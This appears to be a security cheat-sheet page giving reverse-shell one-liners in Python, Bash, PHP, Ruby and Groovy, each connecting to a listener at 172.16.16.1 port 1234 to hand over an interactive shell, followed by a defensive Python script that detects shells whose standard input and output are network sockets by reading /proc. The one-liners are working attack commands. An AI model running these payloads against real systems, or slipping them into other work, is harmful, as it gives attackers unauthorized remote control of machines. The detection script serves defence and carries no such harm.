Reverse Shells: scripting style

One of the biggest advantages of using a scripting language to spawn the reverse shell is that it often isn't very suspicious when viewing the running processes alone. Often you'll find hosts already have several scripting languages installed.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

Bash Reverse Shell:

This is probably the most common reverse shell used.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby Reverse Shell:

ruby -rsocket -e'f=TCPSocket.open("172.16.16.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell:

Note that this snippet is written in Groovy syntax (the list literal and the `as String[]` cast), not plain Java; it runs wherever a Groovy runtime is available.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.16.1/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
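Every variant above shares one trait the process list does not show: a shell whose standard input, output and error are wired to a network socket (the Python `dup2` calls, the `>&`/`<&` redirections in the Bash, PHP and Ruby lines, and the `2>&5 >&5` in the Groovy loop). That is exactly what a defender can check on Linux by reading the `/proc/<pid>/fd/{0,1,2}` link targets. The script below is an added detection example written for this page; it is not code from the original post. The `classify` function decides from a process name and its fd link targets, the constructed `SAMPLE_*` dictionaries stand in for real `readlink` output, and `scan_proc` applies the same check live to `/proc` (the shell-name list and the "socket:[inode]" format are the only assumptions).

```python
import os
import re

# Shell binaries whose stdio is normally a terminal, a pipe or a file,
# not a network socket. Assumed list; extend for your environment.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "ash"}

# /proc/<pid>/fd/N links to a socket look like "socket:[48211]".
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

# Constructed samples of what os.readlink("/proc/<pid>/fd/N") returns.
SAMPLE_REVERSE_SHELL = {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}
SAMPLE_INTERACTIVE = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}
# A child of the cat|while loop: stdin is a pipe, stdout/stderr are the socket.
SAMPLE_LOOP_CHILD = {0: "pipe:[771]", 1: "socket:[48211]", 2: "socket:[48211]"}


def stdio_sockets(fd_targets):
    """Return {fd: socket inode} for each of fd 0/1/2 that points to a socket."""
    found = {}
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(fd_targets.get(fd, ""))
        if m:
            found[fd] = int(m.group(1))
    return found


def classify(comm, fd_targets):
    """Flag a shell whose stdin, stdout or stderr is a network socket.

    'all_stdio_one_socket' is the strongest signal: all three stdio fds on
    the same socket inode is the dup2 / '<&3 >&3 2>&3' pattern.
    """
    name = os.path.basename(comm)
    socks = stdio_sockets(fd_targets)
    return {
        "comm": name,
        "socket_fds": sorted(socks),
        "suspicious": name in SHELL_NAMES and bool(socks),
        "all_stdio_one_socket": len(socks) == 3 and len(set(socks.values())) == 1,
    }


def read_fd_targets(pid):
    """Read the link targets of /proc/<pid>/fd/0,1,2 (Linux only)."""
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            pass  # fd closed, process gone, or no permission
    return targets


def read_comm(pid):
    with open(f"/proc/{pid}/comm") as f:
        return f.read().strip()


def scan_proc():
    """Return a verdict dict (with pid) for every suspicious process in /proc."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            verdict = classify(read_comm(entry), read_fd_targets(entry))
        except OSError:
            continue
        if verdict["suspicious"]:
            verdict["pid"] = int(entry)
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in scan_proc():
        print(hit)
```

Run it as root so every process's fd table is readable. A hit is a lead, not a verdict: socket-activated or inetd-style services legitimately hand a shell a socket as stdio, so review the peer address (from `/proc/net/tcp` or `ss -p`) and the parent process before acting. Interpreter processes (python, ruby, php) that did the `dup2` are deliberately not flagged here; the shell they spawned inherits the fds and is what the check catches.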
